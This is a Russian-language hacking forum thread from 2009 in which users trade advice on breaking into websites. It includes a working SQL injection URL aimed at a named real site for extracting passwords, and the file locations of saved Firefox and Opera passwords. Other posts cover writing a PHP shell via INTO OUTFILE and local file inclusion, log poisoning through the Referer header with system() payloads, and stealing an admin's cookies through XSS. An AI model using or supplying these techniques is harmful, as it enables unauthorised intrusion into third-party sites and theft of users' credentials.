Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. borntobebad

    borntobebad New Member

    Joined:
    23 Mar 2009
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
    versija mysql : 5.0.5

    pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
     
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    тут не блинд
    Code:
    http://caryscars.be/index.php?item=details&id=-150+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16--
     
  3. borntobebad

    borntobebad New Member

    Joined:
    23 Mar 2009
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    a pochemu split4 ne naxodit pole vvoda ?
     
  4. borntobebad

    borntobebad New Member

    Joined:
    23 Mar 2009
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    razobralsa . Split4 pashit .
     
  5. noozike69

    noozike69 New Member

    Joined:
    6 Jul 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
     
  6. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    в Mozilla formhistory.sqlite вроде как....
     
  7. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Opera хранит пароли в wand.dat
    Firefox - в файле signons3.txt , для расшифровки нужен файл key3.db. Оба файла находятся в профиле
     
    #8387 z00MAN, 11 Aug 2009
    Last edited: 11 Aug 2009
  8. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    как через mysql inj выполнить php код,если могу добовлять записи в бд,но они фильтруются.добовляю <?system(ls);?>
    вот что добовляется в бд &lt;?system(ls);?&gt;.
    Ну и при выводе не выполняется.Можн какнить сделать?
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?system(ls);?> перевести в хекс вида 0x...

    только код ты так все-равно не выполнишь, надо слить в файл сначала

    into outfile '/абсолютный_путь/имя_файла'
     
  10. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    into outfile '/абсолютный_путь/имя_файла' там вроде нету прав на запись файлов
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1. Внимательно прочитай всё - http://forum.antichat.ru/thread104591.html
    2. "ам вроде нету прав на запись файлов" - непонятно, что ты имел в виду под этим, если читаешь файло, значит file_priv=Y, второе - ищи папку доступную на запись

    ЗЫЖ Тьфу, ёпт, ты просто из админки что ли добаваляешь типо название темы, и оно пишется в БД? Ничего ты не сделаешь, ищи другой способ
     
  12. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    2Pashkela, он через скуль как я понял заливает файл into outfile )))

    2RazyKK,выполнить пхп файл путём load_file не выйдет, или заливай в tmp находи инклуд и инклудь шелл )
     
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    mr.gr33n кароч я добовляю запись в бд а вывод через union select.
     
  14. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    т.е. заливаешь файлик? или редактируешь данные бд ?
    чет я не въеду малость))
     
  15. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    редактирую,тип в профиле icq или любое др поле
     
  16. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    не выполнится он так (((
    разве что только xss )
     
  17. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    угу сопру куки админа,когда есть доступ к бд форума)))
     
  18. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Ну дык я не говорю что куки тащить надо, просто говорю что пхп код не выполнится таким макаром, только html )
     
  19. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    нашел файл логов через php incl,в reffer вставил
    http://www.site<?php system(ls); ?>site.com/index.php
    вылазит ошибка Parse error: syntax error, unexpected T_STRING что не так?
     
  20. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    http://www.site<?php system('ls'); ?>site.com/index.php
    вроде так должно быть
     
Thread Status:
Not open for further replies.